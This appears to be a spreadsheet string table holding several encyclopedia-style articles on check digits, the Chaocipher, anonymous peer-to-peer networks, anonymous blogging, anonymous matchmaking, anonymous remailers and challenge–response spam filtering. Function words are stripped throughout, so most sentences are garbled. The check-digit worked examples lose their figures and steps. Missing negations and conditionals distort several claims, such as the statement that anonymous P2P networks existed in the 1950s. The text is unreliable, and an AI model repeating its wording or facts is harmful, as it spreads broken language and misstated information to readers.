instance, upc-a barcode tissues "036000241457". last digit check digit "7", numbers correct check digit calculation must produce number digits: 0+6+0+2+1+5 multiply result even number digits: 3+0+0+4+4 results together: calculate check digit, take remainder 10), also known modulo 10), subtract therefore, check digit value i.e. remainder 7.another example: calculate check digit following food item "01010101010x". number digits: 0+0+0+0+0+0 multiply result even number digits: 1+1+1+1+1=5. results together: calculate check digit, take remainder 10), also known modulo 10), subtract i.e. remainder therefore, check digit value isbn final character ten-digit international standard book number check digit computed multiplying digit position number (counting right) taking products modulo digit farthest right (which multiplied check digit, chosen make correct. need value represented letter example, take isbn 0-201-53082-1: products 0×10 (mod 11). isbn valid. note positions also counted left, case check digit multiplied check validity: 1×10 (mod 11). isbn isbn january 2007) equal ean-13 code found underneath book's barcode. check digit generated except even digits multiplied instead digits. (gln, gtin, numbers administered gs1) (european article number) check digits (administered gs1) calculated summing position numbers multiplied adding even position numbers. numbers examined going right left, first position last digit code. final digit result subtracted calculate check digit left as-is already zero). check digit calculator detailed documentation online gs1's website. another official calculator page shows mechanism gtin-13 global location number/gln. ncda noid check digit algorithm (ncda), since 2004, designed application persistent identifiers works variable length strings letters digits, called extended digits. widely used identifier scheme somewhat used schemes, handle system doi. extended digit constrained betanumeric characters, alphanumerics minus vowels letter (ell). this restriction helps generating opaque strings unlikely form words accident contain having prime radix r=29, betanumeric repertoire permits algorithm guarantee detection single-character transposition errors strings less r=29 characters length (beyond provides slightly weaker check). algorithm generalizes character repertoire prime radix strings less characters length. other examples check digits international international sedol number. final digit issn code number. international securities identifying number (isin). object management group figi standard final digit. international registry number's final digit. modulo check digits credit card account numbers, calculated luhn algorithm. also used norwegian (customer identification number) numbers used bank giros (credit transfer), used imei mobile phones. last check digit ean/upc serialisation global trade identification number (gtin). applies gtin-8, gtin-12, gtin-13 gtin-14. final digit duns number (though scheduled change, final digit chosen freely allocations, rather check digit). third fourth digits international bank account number (modulo check). final digit international standard text code. final character encoded magnetic stripe card computed longitudinal redundancy check. tenth digit national provider identifier healthcare industry. final digit postnet code. north american cusip number. final (ninth) digit routing transit number, bank code used united states. ninth digit vehicle identification number (vin). mayo clinic patient identification numbers used arizona florida include trailing check digit. eleventh digit customs border protection entry number. central america guatemalan number (nit número identificación tributaria) based modulo eurasia number uses modulo algorithm. spanish fiscal identification number (número identificación fiscal, nif), (based modulo 23). dutch burgerservicenummer (bsn) (national identifier) uses modulo algorithm. ninth digit israeli teudat zehut (identity card) number. 13th digit serbian former yugoslav unique master citizen number (jmbg). (but them, errors non-residency) last digits 11-digit turkish identification number (turkish: kimlik numarası). ninth character 14-character cattle passport number (cycles british cattle movement service). ninth digit icelandic kennitala (national number). modulo check digits belgian serbian bank account numbers. serbia sometimes also uses modulo reference number. ninth digit hungarian number (social insurance number). residents india, unique identity number named aadhaar trailing 12th digit calculated verhoeff algorithm. intellectual property office singapore (ipos) confirmed format application numbers registrable intellectual property (ip, e.g., trade marks, patents, registered designs). include check character calculated damm algorithm. last digit chinese citizen number (second generation) calculated modulo 11-2 specified chinese guobiao (aka. national standard) gb11643-1999 adopts 7064:1983. used calculated checking digit 11th digit estonian isikukood (personal identification code). oceania australian file number (based modulo 11). seventh character zealand number. last digit zealand locomotive's traffic monitoring system (tms) number. algorithms notable algorithms include: luhn algorithm (1954) verhoeff algorithm (1969) damm algorithm (2004) also checksum casting nines, similar modular check check bit; binary equivalent references external links identification numbers check digit schemes mathematical explanation various check digit schemes) upc, ean, scc-14 check digit calculator check digit calculator</t>
  </si>
  <si>
    <t>Chaocipher</t>
  </si>
  <si>
    <t>chaocipher cipher method invented john francis byrne 1918 described 1953 autobiographical silent years. believed chaocipher simple, unbreakable. byrne stated machine used encipher messages could fitted cigar box. offered cash rewards anyone could solve 2010 byrne's daughter-in-law, patricia byrne, donated chaocipher-related papers artifacts national cryptologic museum meade, maryland, usa. this disclosure chaocipher algorithm. operation chaocipher system consists alphabets, "right" alphabet used locating plaintext letter ("left") alphabet used reading corresponding ciphertext letter. underlying algorithm related concept dynamic substitution whereby alphabets slightly modified input plaintext letter enciphered. this leads nonlinear highly diffused alphabets encryption progresses. deciphering identical enciphering, ciphertext letter located "left" alphabet corresponding plaintext letter read "right" alphabet. detailed description chaocipher algorithm available well discussions deciphered plaintexts solution byrne's challenge. points interest henry langen, editor cryptogram time, quoted saying explain machine made somewhat like typewriter revolving disks alphabets arranged along periphery complete disorder with disks used, confused result utter chaotification plaintext message." until 2010 least three people knew works: byrne's john, editors cryptologia john confided underlying method 1990. also autokey cipher references further reading john byrne's chaocipher revealed: historical technical appraisal moshe rubin, cryptologia, volume issue october 2011 decoding chaocipher exhibits peuha (pdf). retrieved april 2014. chaocipher exhibit history, analysis, solution cryptologia's 1990 challenge jeff calof, jeff hill moshe rubin, cryptologia, volume issue january 2014, pages 1–25 external links chaocipher clearing house basic resources analyses working chaocipher crypto forum discussion analysis chaocipher cracking chaocipher visual description chaocipher works, explanation cracking exhibit interesting ciphers computer methods solving review chaocipher. famous unsolved codes ciphers elonka dunin's famous site dedicated unsolved codes ciphers, including chaocipher. retrieved april 2014</t>
  </si>
  <si>
    <t>Anonymous P2P</t>
  </si>
  <si>
    <t>anonymous communication system peer-to-peer distributed application nodes, used share resources, participants anonymous pseudonymous. anonymity participants usually achieved special routing overlay networks hide physical location node participants.interest anonymous systems increased recent years many reasons, ranging desire share files without revealing one's network identity risking litigation distrust governments, concerns mass surveillance data retention, lawsuits bloggers. motivation anonymity there many reasons anonymous technology; generic forms online anonymity. users desire anonymity usually wish identified publisher (sender), reader (receiver), information. common reasons include: censorship local, organizational, national level personal privacy preferences preventing tracking data mining activities material distribution considered illegal incriminating possible eavesdroppers material legal socially deplored, embarrassing problematic individual's social world fear retribution (against whistleblowers, unofficial leaks, activists believe restrictions information knowledge)a particularly open view legal illegal content given philosophy behind freenet. governments also interested anonymous technology. united states navy funded original onion routing research development network, later funded electronic frontier foundation developed non-profit organization project, inc. arguments anonymous communication general while anonymous systems support protection unpopular speech, also protect illegal activities, fraud, libel, exchange illegal pornography, unauthorized copying copyrighted works, planning criminal activities. critics anonymous systems hold disadvantages outweigh advantages offered systems, communication channels already sufficient unpopular speech. proponents anonymous systems believe restrictions free speech serve authoritarian interests, information ethically neutral, people acting upon information good evil. perceptions good evil also change (see moral panic); example, anonymous peer-to-peer networks existed 1950s 1960s, might targeted carrying information civil rights anarchism. easily accessible anonymous networks seen democratization encryption technology, giving general populace access secure communications channels already used governments. supporters view, phil zimmermann, argue anti-surveillance technologies help equalize power governments people, actual reason banning them. john pilger opines monitoring populace helps contain threats "consensual view established authority" threats continuity power structures privilege. freedom speech some claim true freedom speech, especially controversial subjects, difficult impossible unless individuals speak anonymously. anonymity possible, could subjected threats reprisals voicing unpopular view. this reason voting done secret ballot many democracies. controversial information party wants keep hidden, details corruption issues, often published leaked anonymously. anonymous blogging anonymous blogging widespread anonymous networks. while anonymous blogging possible non-anonymous internet degree too, provider hosting blog question might forced disclose blogger's address google revealed anonymous blogger's identity). anonymous networks provide better degree anonymity. flogs (anonymous blogs) freenet, syndie blogging tools osiris examples anonymous blogging technologies. argument anonymous blogging delicate nature work situation. sometimes blogger writing real name faces choice either staying silent causing harm themselves, colleagues company work for.another reason risk lawsuits. some bloggers faced multimillion-dollar lawsuits (although later dropped completely); anonymous blogging provides protection risks. censorship internet domain names non-anonymous internet, domain name like "example.com" accessing information. censorship wikileaks website shows domain names extremely vulnerable censorship. some domain registrars suspended customers' domain names even absence court order. affected customer, blocking domain name bigger problem registrar refusing provide service; typically, registrar keeps full control domain names question. case european travel agency, .com websites shut without court process held registrar since then. travel agency rebuild sites .net top-level domain instead.on hand, anonymous networks rely domain name registrars. example, freenet, hidden services implement censorship-resistant urls based public-key cryptography: person correct private update take down. control online tracking anonymous also value normal daily communication. when communication anonymous, decision reveal identities communicating parties left parties involved available third party. often need desire communicating parties reveal identities. matter personal freedom, many people want processes place default supply unnecessary data. cases, data could compiled histories activities. example, current phone systems transmit caller information default called party (although disabled either single call calls). person calls make inquiry product time movie, party called record calling phone number, able obtain name, address information caller. this information available someone walks store makes similar inquiry. effects surveillance lawful activity online surveillance, recording retaining details e-mail traffic, effects lawful activities. people deterred accessing communicating legal information know possible surveillance believe communication seen suspicious. according professor daniel solove, effects "harm society because, among things, reduce range viewpoints expressed degree freedom engage political activity." access censored copyrighted material most countries censor publication certain books movies, certain types content. other material legal possess distribute; example, copyright software patent laws forbid distribution. these laws difficult impossible enforce anonymous networks. anonymous online money with anonymous money, becomes possible arrange anonymous markets sell anything anonymously. anonymous money could used avoid collection. however, transfer physical goods parties could compromise anonymity.proponents argue conventional cash provides similar kind anonymity, existing laws adequate combat crimes like evasion might result anonymous cash, whether online offline. functioning anonymous anonymity pseudonymity some networks commonly referred "anonymous p2p" truly anonymous, sense network nodes carry identifiers. others actually pseudonymous: instead identified addresses, nodes identified pseudonyms cryptographic keys. example, node mute network overlay address derived public key. this overlay address functions pseudonym node, allowing messages addressed freenet, hand, messages routed using keys identify specific pieces data rather specific nodes; nodes anonymous. term anonymous used describe kinds network difficult—if impossible—to determine whether node sends message originated message simply forwarding behalf another node. every node anonymous network acts universal sender universal receiver maintain anonymity. node receiver send, neighbouring nodes would know information requesting only, removing plausible deniability recipient (and consumer) information. thus, order remain anonymous, nodes must ferry information others network. spam attacks anonymous networks originally, anonymous networks operated small friendly communities developers. interest anonymous increased user base grew, malicious users inevitably appeared tried different attacks. this similar internet, widespread followed waves spam distributed (denial service) attacks. such attacks require different solutions anonymous networks. example, blacklisting originator network addresses work anonymous networks conceal information. these networks vulnerable attacks well smaller bandwidth, shown examples network. conspiracy attack anonymous network could considered criminal computer hacking, though nature network makes impossible prosecute without compromising anonymity data network. opennet darknet network types like conventional networks, anonymous networks implement either opennet darknet (often named friend-to-friend) network type. this describes node network selects peer nodes: opennet network, peer nodes discovered automatically. there configuration required little control available nodes become peers. darknet network, users manually establish connections nodes people know. darknet typically needs effort node trusted nodes peers.some networks like freenet support network types simultaneously node manually added darknet peer nodes automatically selected opennet peers) friend-to-friend f2f) network, users make direct connections people know. many networks support indirect anonymous pseudonymous communication users know trust another. example, node friend-to-friend overlay automatically forward file request file) anonymously "friends", without telling either other's name address. these "friends" turn forward file request) "friends", users friend-to-friend network cannot find else participating beyond circle friends, networks grow size without compromising users' anonymity. some friend-to-friend networks allow user control kind files exchanged "friends" within node, order stop exchanging files user disapproves advantages disadvantages opennet compared darknet disputed, friend-to-friend article summary. list anonymous networks clients public clients classified-ads open source dht-based decentralized messaging voice app. allows users expose personal details hide network addresses nodes. darkmx file-sharing client modeled winmx/tixati built-in implementation tor. digitalnote open-source anonymous decentralized encrypted messaging system based blockchain technology freenet censorship-resistant distributed file system anonymous publishing (open source, written java) gnunet framework, includes anonymous file sharing primary application (gnu project, written alpha status) muwire filesharing software, chat rooms. even running inside network, called 'i2p client' router embedded, makes standalone software. perfect dark japanese file-sharing client based distributed data store. address connected nodes, downloading. amoeba similar client/network. tribler open source bittorrent client. neighboring nodes proxies one's client torrent swarm. proxy file uploaded, nodes swarm exit node. zeronet decentralized internet-like network peer-to-peer users. allows tunneling http-traffic tor. clients fully decentralized overlay network strong anonymity end-to-end encryption, many applications (p2p, browsing, distributed anonymous e-mail, instant messaging, irc, ...) running (free/open source, platform-independent) i2p-bote anonymous, secure (end-to-end encrypted), serverless mail application remailer functionality network i2p-messenger anonymous, secure (end-to-end encrypted), serverless instant messenger network i2psnark anonymous bittorrent client network i2phex gnutella client communicates anonymously imule amule port running network robert (p2p software) another anonymous bittorrent client network i2p-tahoe-lafs censorship-resistant distributed file system anonymous publishing file sharing (open source, written python, pre-alpha status) vuze (formerly azureus) bittorrent client option using (initially open source, written java) biglybt successor vuze. bittorrent client downloads routed i2p, searches carried (open source, written java) defunct (public clients) longer developed bitblinder (2009-2010) file sharing bitmessage anonymous decentralized messaging system serving secure replacement email cashmere (2005) resilient anonymous routing entropy (2003-2005) freenet compatible earthstation (2003-2005) anonymity controverted herbivore (2003-2005) file sharing messaging. used dining cryptographers problem. marabunta (2005-2006) distributed chat mute (2003-2009) file sharing neoloader filesharing software compatible bittorrent edonkey2000. anonymous used "neoshare" feature (that proprietary "neokad" network) netsukuku peer-to-peer routing system aiming build free independent internet nodezilla (2004-2010) anonymizing, closed source network layer upon applications built osiris (serverless portal system) anonymous distributed portals creator. system (2006-2010) distributed file system shared files represented randomized data blocks rshare (2006-2007) file sharing share japanese filesharing client modeled winny syndie content (mainly forums) syndication program operates numerous anonymous non-anonymous networks (open source, written java) stealthnet (2007-2011) successor rshare winny japanese filesharing program modeled freenet relies mixnet distributed datastore provide anonymity private clients private networks networks allow mutually trusted computers share files. this achieved using central server authenticate clients, case functionality similar private server, files transferred directly clients. alternatively, users exchange passwords keys friends form decentralized network. examples include: syncthing free, open-source peer-to-peer file synchronization application. sync files devices. data security data safety built design software. resilio sync proprietary alternative syncthing private (friend-to-friend) clients friend-to-friend networks networks allows users make direct connections people know. passwords digital signatures used authentication. examples include filetopia anonymous encrypted friend-to-friend. file sharing, chat, internal mail service oneswarm backwards compatible bittorrent client privacy-preserving sharing options, aims create large network. retroshare filesharing, serverless email, instant messaging, voip, chatrooms, decentralized forums. hypothetical defunct networks hypothetical following networks exist design development anonet extensible anonymizer steganography support development) crowds reiter rubin's system "blending crowd" known attack p2priv peer-to-peer direct anonymous distribution overlay anonymity virtual links parallelization currently development significant, unsolved problems real world environment phantom anonymity protocol fully decentralized high-throughput anonymization network longer development) race (resilient anonymous communication everyone) project darpa build anonymous, attack-resilient mobile communication system reside completely within network environment, capable avoiding large-scale compromise preventing compromised information useful identifying system nodes information encrypted nodes times, even computation; preventing communications compromise virtue obfuscating communication protocols. defunct dormant bitblinder decentralised anonymity software program included increased speed. website clients longer functional. invisible project anonymous irc, inspired freenet, later became (invisible internet project). mnet (formerly mojonation) distributed file system anonymous wireless mesh network possible implement anonymous wireless mesh network; unlike fixed internet connections, users need sign participate network, identifiable hardware. protocols wireless mesh networks optimized link state routing protocol (olsr) follow-up protocol b.a.t.m.a.n., designed decentralized auto-ip assignment. also netsukuku. even government outlaw wireless software, would difficult enforce without considerable infringement personal freedoms. alternatively, government could outlaw purchase wireless hardware itself. also anonymity application anonymous remailer anonymous browsing comparison file sharing applications dark data privacy internet privacy list anonymously published works personally identifiable information privacy software privacy-enhancing technologies flaim i2p-bote java anon proxy free haven project secure communication related items references external links planet peer wiki wiki various anonymous applications survey anonymous peer-to-peer file-sharing (2005) anonymous, decentralized uncensored file-sharing booming torrentfreak (2011)</t>
  </si>
  <si>
    <t>Anonymous blog</t>
  </si>
  <si>
    <t>anonymous blog blog without acknowledged author contributor. anonymous bloggers achieve anonymity simple pseudonym, sophisticated techniques layered encryption routing, manipulation post dates, posting publicly accessible computers. motivations posting anonymously include desire privacy fear retribution employer (e.g., whistleblower cases), government countries monitor censor online communication), another group. deanonymizing techniques fundamentally, deanonymization divided categories: social correlation compares known details person's life contents anonymous blog look similarities. author attempt conceal identity, social correlation straightforward procedure: simple correlation "anonymous" blogger's name, profession, lifestyle, etc., known person. even author generally attempts conceal identity providing name, location, etc.), blog deanonymized correlating seemingly innocuous, general details. technical identification determines author's identity blog's technical details. extreme cases, technical identification entails looking server logs, internet provider logs, payment information associated domain name.these techniques used together. order techniques employed typically escalates social correlation techniques, require compliance outside authorities (e.g., internet providers, server providers, etc.), technical identification. types just blog subject, anonymous blog. most fall following major categories: political: commentary political situation within country, open risk prosecution. anonymous blogging also power political debate, 2008 blogger eduwonkette, later revealed columbia university sociology graduate student jennifer jennings, successfully questioned york mayor michael bloomberg's takeover york schools. revolutionary counter-revolutionary: these either inspiring activity counter activity, often violent state apparatus. example, salam pax, baghdad blogger, wrote guardian newspaper pseudonym could shed saddam hussein longer ruled iraq. similar bloggers appeared arab spring. dissident: dissident blogs document life oppressive secretive regime, actively promoting inspiring revolutionary counter-revolutionary action. mosul eye, described life isil occupation mosul, iraq, called reliable sources information life inside city since began june 2014. religious: views comments religious view points issues, perhaps questioning written standpoints. whistleblower: whistleblower blog modern-day twist classical "insider spotting illegality" theme. this cover sectors issues. among notable irish cross head international department noel wardick, highlighted €162,000 donations 2004 indian ocean earthquake tsunami account three years. after spending €140,000 private investigators legal expenses find whistle blower, including court orders obtain wardick's identity google, disciplined later dismissed wardick. 2010, internal enquiry wardick's allegations found bank accounts, proposals overhaul irc's management discussed dáil december. questions answered tony killeen, minister defence. wardick later successfully sued unfair dismissal. company insider: company employee insider reports company operations issues within organisation. famous probably dooce.com blogger heather armstrong, fired writing satirical accounts experiences dot-com startup personal blog, dooce.com. community pressure: written citizen area, particular subject, bring change. 2007, reporter blogger mike stark came support anonymous blogger spocko, trying bring called "violent commentary" francisco area radio station ksfo attention advertisers. experience/customer service: most experience blogs focus personal insights views customer service, frequently dissatisfaction. most anonymous experience blogs written anonymously allow customer/user keep experiencing using service, reporting/blogging, nudging defined appropriate level target organisation. among sarah wu's/mrs "fed with lunch" blog, chronicle experience adult eating chicago area high school lunch every year, turned book. personal: personal blog strays personal life ways allow risk taking open terms detail. hence, many blogs sexual nature, although many also exist health problems disabilities world cope challenges. some latest personal blogs seen many extended group therapy, covering issues including weight loss.recently, anonymous blogging moved aggressive active style, organized crime groups mafia using anonymous blogs mayors local administrators italy. online identity determined addresses address unique numerical label assigned computer connected computer network uses internet protocol communication. popular implementation internet protocol would internet (capitalized, differentiate smaller internetworks). internet service providers (isps) allocated chunks addresses regional internet registry, assign customers. however, isps enough addresses give customers address. instead, dhcp used; customer's device (typically modem router) assigned address pool available addresses. keeps address certain amount time (e.g., weeks). device still active lease, renew connection keep address. otherwise, address collected added pool redistributed. thus, addresses provide regional information (through regional internet registries) and, logs, specific customer information. while prove specific person originator blog post could someone else using customer's internet, all), provides powerful circumstantial evidence. word character frequency analysis character frequency analysis takes advantage fact individuals different vocabulary: large body data tied individual (for example, public figure official blog), statistical analysis applied body data anonymous blog similar are. way, anonymous bloggers tentatively deanonymized. also anonymous anonymous browsing list anonymously published works citizen journalism network anonymous remailer (anonymity network) references external links computer security report volume issue pages 127-136 blogs, lies doocing sylvia kierkegaard (2006) legal guide bloggers electronic frontier foundation blog personal</t>
  </si>
  <si>
    <t>Anonymous matching</t>
  </si>
  <si>
    <t>anonymous matching matchmaking method facilitated computer databases, user confidentially selects people interested dating computer identifies reports matches pairs users share mutual attraction. protocols anonymous matchmaking date back 1980s, earliest papers topic baldwin gramlich, published 1985. from technical perspective, problem solution trivial likely predate even paper. problem becomes interesting requires sophisticated cryptography matchmaker (central server) trusted. purpose protocol allow people initiate romantic relationships avoiding risk embarrassment, awkwardness, negative consequences associated unwanted romantic overtures rejection. general concept patented september 1999, david blumberg doyoudo chief executive officer sudai, several websites already employing methodology date, thus apparently allowed continue using united states patent 5,950,200 points several potential flaws traditional courtship conventional dating systems strangers meet online, promoting anonymous matching friends acquaintances better alternative: human relationships often fraught difficulties. addition, human beings risk-averse. often, even people want initiate first steps relationship, neither person takes action shyness, fear rejection, societal pressures constraints. various systems exist help people meet other. example, computer dating services allow people view video tapes pictures prospective partners choose common areas hobbies. people introduced agree idea. unfortunately, situations, neither person actually finally introduced. neither person ever other, certain amount shyness fear rejection first meet situation. addition, persons must initially approach dating service. people, action also embarrassing. what needed safe, simple, confidential, non-judgmental people reveal true feelings interests without risk embarrassment rejection. implementations some notable implementations idea been: baldwin gramlich, cited above. ecrush. launched valentine's day, 1999, successful implementation concept. targeted teen market, million users claims 600,000 legitimate matches [1]. doyou2.com. website's owner, doyoudo, inc., incorporated september 1999 acquired matchnet september 2000 exchange stock valued $1,820,000. according matchnet's 2003 annual report, "the acquisition made primarily purpose acquiring patent business model future development." livejournal secret crush meme. mid-2003, company named anonymous consulting created online quiz called "secret crush meme,"[2] would provide user chart showing livejournal friends list crush them, well "kind" crush (public, secret ex). quiz designed harvest crushes livejournal users (hence elaborate disclaimer). october 2003, quiz, called "secret crush meme revenge secret crush meme," released [3], showed users many crushes users them, well kind. there catch: four dollars, company would tell someone crushes them. this created controversy couples listed users crushes well people getting ex-crushes felt gotten public crushes, much ethics debating. finally small perl script written distributed poison database. faced attempts poison database many different addresses, project shut down. secretadmirer.com. this service claims 100,000 successful matches [4]. salon.com called secretadmirer.com "the grandfather concept, launched 1997." methodology different others order match occur, recipient must send emails out, rather simply place names confidential list.these commercial implementations trust central server, simplifying solution implementation drastically. baldwin gramlich solved case 1985, well notable challenging case central server trusted. viral marketing ecrush, doyou2.com, livejournal secret crush meme, secretadmirer.com examples anonymous matching services using viral marketing increase membership. users encouraged send anonymous email crush visit site enter crushes, facilitating match. case secretadmirer.com, email mandatory; represents aggressive type viral marketing. least site, crushlink, accused ecrush sending spam emails disguised crush notifications. according salon article, "what makes someonelikesyou crushlink different rest sites genre this: bait hopeful visitors hand many e-mail addresses possible trading clues e-mail addresses"[6]. both sites defunct. references r.w. baldwin w.c. gramlich, cryptographic protocol trustable match making, ieee security privacy, 1985. lester, amelia borja, anais rise success sparknotes, harvard crimson, october 2001. mieszkowski, katharine: loved august 2002. united states patent 5,950,200: method apparatus detection reciprocal interests feelings subsequent notification, united states patent trademark office, september 1999.</t>
  </si>
  <si>
    <t>Anonymous remailer</t>
  </si>
  <si>
    <t>anonymous remailer server receives messages embedded instructions send next, forwards without revealing originally came from. there cypherpunk anonymous remailers, mixmaster anonymous remailers, servers, among others, differ work, policies adopt, type attack anonymity e-mail intended resist. remailing discussed article applies e-mails intended particular recipients, general public. anonymity latter case easily addressed using several methods anonymous publication. types remailer there several strategies affect anonymity handled e-mail. general, different classes anonymous remailers differ regard choices designers/operators made. these choices influenced legal ramifications operating specific types remailers.it must understood every data packet traveling internet contains node addresses strings) sending intended recipient nodes, data packet ever actually anonymous level. addition, standards-based e-mail messages contain defined fields headers source transmitting entities (and internet nodes well) required included. some remailers change types address messages forward, list forwarding nodes e-mail messages well, message passes through; effect, substitute 'fake source addresses' originals. source address' packet become remailer server itself, within e-mail message (which usually several packets), nominal 'user' server. some remailers forward anonymized e-mail still remailers, several hops e-mail actually delivered intended address. there are, less, four types remailers: pseudonymous remailers pseudonymous remailer simply takes away e-mail address sender, gives pseudonym sender, sends message intended recipient (that answered remailer). cypherpunk remailers, also called type cypherpunk remailer sends message recipient, stripping away sender address answer message sent cypherpunk remailer. message sent remailer usually encrypted, remailer decrypt send recipient address hidden inside encrypted message. addition, possible chain three remailers, remailer can't know sending message whom. cypherpunk remailers keep logs transactions. mixmaster remailers, also called type mixmaster, user composes email remailer, relayed node network using smtp, finally arrives final recipient. mixmaster send emails way. email sent anonymously individual, able respond, reply address must included body email. also, mixmaster remailers require computer program write messages. such programs supplied standard part operating systems mail management systems. mixminion remailers, also called type mixminion remailer attempts address following challenges mixmaster remailers: replies, forward anonymity, replay prevention rotation, exit policies, integrated directory servers dummy traffic. they currently available linux windows platforms. some implementations open source. traceable remailers some remailers establish internal list actual senders invented names recipient send mail invented name some-remailer.example. when receiving traffic addressed user, server software consults list, forwards mail original sender, thus permitting anonymous—though traceable access list—two-way communication. famous "penet.fi" remailer finland several years. because existence lists type remailing server, possible break anonymity gaining access list(s), breaking computer, asking court merely police places) order anonymity broken, and/or bribing attendant. this happened penet.fi result traffic passed scientology. church claimed copyright infringement sued penet.fi's operator. court ordered list made available. penet's operator shut destroying records (including list) retain identity confidentiality users; though forced supply court real e-mail addresses users.more recent remailer designs cryptography attempt provide less service, without much risk loss user confidentiality. these generally termed servers pseudonymous remailers. degree remain vulnerable forced disclosure courts police) remain unclear since statutes/regulations cryptanalytic developments proceed apace. multiple anonymous forwarding among cooperating remailers different jurisdictions retain, cannot guarantee, anonymity determined attempt governments, civil litigators. untraceable remailers users accept loss two-way interaction, identity anonymity made secure. keeping list users corresponding anonymizing labels them, remailer ensure message forwarded leaves internal information behind later used break identity confidentiality. however, handled, messages remain vulnerable within server (e.g., trojan software compromised server, compromised server operator, mis-administration server), traffic analysis comparison traffic server suggest quite lot—far almost would credit. mixmaster strategy designed defeat attacks, least increase cost (i.e., 'attackers') beyond feasibility. every message passed several servers (ideally different legal political jurisdictions), attacks based legal systems become considerably difficult, 'clausewitzian' friction among lawyers, courts, different statutes, organizational rivalries, legal systems, etc. and, since many different servers server operators involved, subversion (i.e., either system operator) becomes less effective also since (most likely) able subvert entire chain remailers. random padding messages, random delays forwarding, encryption forwarding information forwarding remailers, increases degree difficulty attackers still message size timing largely eliminated traffic analysis clues, lack easily readable forwarding information renders ineffective simple automated traffic analysis algorithms. web-based mailer there also services allow users send anonymous e-mail messages. these services provide anonymity real remailers, easier use. when using web-based anonymous e-mail anonymous remailer service, reputation first analyzed, since service stands senders recipients. some aforementioned services users i.p. addresses ensure break law; others offer superior anonymity attachment functionality choosing trust users breach websites terms service (tos). remailer statistics cases, remailers owned operated individuals, stable might ideally fact, remailers can, have, gone without warning. important up-to-date statistics choosing remailers. remailer abuse blocking governments although re-mailer systems used responsibly, anonymity provide exploited entities individuals whose reasons anonymity necessarily benign.such reasons could include support violent extremist actions, sexual exploitation children commonly frustrate accountability 'trolling' harassment targeted individuals, companies (the dizum.com re-mailer chain abused recently 2013 purpose.) response re-mailers abuse potential often disclaim responsibility dizum.com does), owing technical design (and ethical principles) many systems, impossible operators physically unmask using systems. some re-mailer systems claim would illegal monitor certain types abuse all.until technical changes made remailers concerned mid-2000s, re-mailers (notably nym.alias.net based systems) seemingly willing genuine (and thus valid) otherwise forged address. this loophole allowed trolls mis-attribute controversial claims statements causing offence, upset harassment genuine holder(s) address(es) forged. while re-mailers disclaim responsibility, comments posted blocked countries. 2014, dizum.com netherlands-based remailer) seemingly blocked authorities pakistan, comments (anonymous) user service made concerning figures islam. also anonymity anonymity application anonymous blogging anonymous anonymous remailer cypherpunk anonymous remailer (type mixmaster anonymous remailer (type mixminion anonymous remailer (type iii) anonymous browsing data privacy identity theft internet privacy personally identifiable information privacy software privacy-enhancing technologies i2p-bote java anon proxy onion routing (network) pseudonymity, pseudonymization pseudonymous remailer (a.k.a. servers) penet remailer traffic analysis winston smith project network references remailer vulnerabilities email security, bruce schneier (isbn 0-471-05318-x) computer privacy handbook, andre bacard (isbn 1-56609-171-3)</t>
  </si>
  <si>
    <t>Challenge–response spam filtering</t>
  </si>
  <si>
    <t>challenge–response c/r) system type spam filter automatically sends reply challenge (alleged) sender incoming e-mail. originally designed 1997 stan weatherby, called email verification. reply, purported sender asked perform action assure delivery original message, would otherwise delivered. action perform typically takes relatively little effort once, great effort perform large numbers. this effectively filters spammers. challenge–response systems need send challenges unknown senders. senders previously performed challenging action, previously sent e-mail(s) would automatically whitelisted. challenge challenge–response systems systems attempt provide challenges fulfilled easily legitimate senders non-easily spammers. characteristics differ legitimate senders spammers exploited achieve goal: legitimate senders valid return address, spammers usually forge return address. this means spammers challenge, making automatically fail required action. spammers send e-mail large quantities perform challenging actions large numbers, legitimate senders perform every e-mail contact.listed examples challenges could used exploit differences: simply sending (unmodified) reply challenging message. challenge includes url, loaded appropriate browsing tool respond challenge, simply clicking link sufficient respond challenge. challenge requiring reading natural language instructions reply, inclusion special string pass-code reply. example, converting date string (such 'thu 08:45:44 2012') corresponding timestamp (1326379544). other turing test approaches include simple problem, answering simple question text recipient. systems attempt produce challenges auto response difficult, even unsolved artificial intelligence problem. example (also found many sites) "captcha" test sender required view image containing word phrase respond word phrase text.nowadays systems used widely enough make spammers bother (automatically) respond challenges. therefore, systems generally rely simple challenge would made complicated spammers ever build automated responders. recommendations systems systems ideally: allow users view messages holding queue. comply requirements recommendations 3834. obey detailed list principles maintained brad templeton, including allowing creation “tagged” addresses allow pass-codes placed either subject: header body message—any lets messages accepted without challenged. example, tmda system create "tagged" addresses permit: mail sent particular address mail contains certain “keyword” mail sent within pre–set length time, allow correspondence related online order, expires disallow future marketing e-mail.problems sending challenges forged email addresses reduced challenges sent when: message header properly formed message sent address associated domain server passed greetpause test server passed greylisting test originating address found trusted blacklists sender's email address failed e-mail authentication test, using techniques dkim. criticisms critics systems raised several issues regarding legitimacy usefulness email defense. number issues relate programs auto-respond e-mail, including mailing list managers, vacation programs bounce messages mail servers. challenges sent forged email addresses spammers fake, non-existent address sender address from: field) e-mail header, also forged, existing sender address valid, arbitrary person's address without person's consent). latter would become increasingly common e.g. callback verification would become popular detect spam. systems challenging message forged sender address would send challenge message person whose address forged. this would create e-mail backscatter, would effectively shift burden person would received spam person whose address forged treated unsolicited bulk email (ube) receiving system, possibly leading blacklisting mail server even listing dnsbl. addition, forged sender decided validate challenge, user would receive spam anyway forged sender address would whitelisted. though definitely undesirable side-effect, issue would non-existent people, whose email address used forged address spam, happen system themselves. case, users must implement form return address signing (such bounce address validation) ensure challenge goes through. also, systems like dkim became common, forged sender addresses would recognized systems reaching system. cases, systems tricked becoming spam relays. useful, part message challenge generally included challenge message. spammer, knowing he's sending using system, could design message "spam payload" part message challenge message includes. case, forged sender actual recipient spam, system unwittingly relay. social issues disseminating ordinary email address protected system results challenges send mail address. some critics consider rude give people email address, require (unless previously whitelisted, might always possible) answer challenge send mail.advocates systems argue benefits outweigh 'burden' incidental challenge, probably never final solution spam without laying kind burden e-mail sender. they reason widespread systems understood, accepted appreciated are. analogy snail mail, sender prepared stamp, analogy phone calls, caller prepared outgoing call. interaction mailing lists automated mailers some systems interact badly mailing list software. person subscribed mailing list begins software, posters mailing list confronted challenge messages. order confirmations, billing statements delivery notices online shopping systems usually sent automated systems. email challenges sent systems lost, legitimate mail sent systems reach system user. advocates systems argue that, though takes extra effort, solutions problems exist end-user behind system simple things: whitelist mailinglist address manually soon subscribes note: many email groups, member know group's address receipt "welcome" email, thus making recommendation unworkable. 'tagged email addresses' mailinglists automated mailers like above, recognized cleared automatically system. manually inspect message queue overriding process case system holds expected message automated mailer. 